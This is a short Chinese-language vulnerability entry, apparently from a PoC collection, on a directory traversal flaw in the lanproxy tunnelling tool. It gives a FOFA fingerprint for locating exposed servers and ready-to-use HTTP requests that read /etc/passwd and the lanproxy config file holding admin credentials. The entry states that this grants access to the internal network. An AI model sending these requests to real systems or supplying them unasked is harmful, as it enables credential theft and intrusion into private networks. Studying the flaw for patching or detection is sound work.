lanproxy 目录遍历漏洞（CVE-2020-3019）.md

lanproxy 目录遍历漏洞（CVE-2020-3019）

lanproxy是一个内网穿透工具，lanproxy v0.1-20171128版本存在目录遍历漏洞，可直接读取配置文件获取账号密码登录lanproxy后台，从而可以直接进入内网。

FOFA：

"Server: LPS-0.1"

PoC：

GET /../../../../../../../../../../../../../../etc/passwd HTTP/1.1
lanproxy配置文件：
GET /../conf/config.properties HTTP/1.1

ref：

• maybe-why-not/lanproxy#1
• https://help.aliyun.com/noticelist/articleid/1060779015.html
• https://github.com/ffay/lanproxy
• https://forum.ywhack.com/thread-114939-1-1.html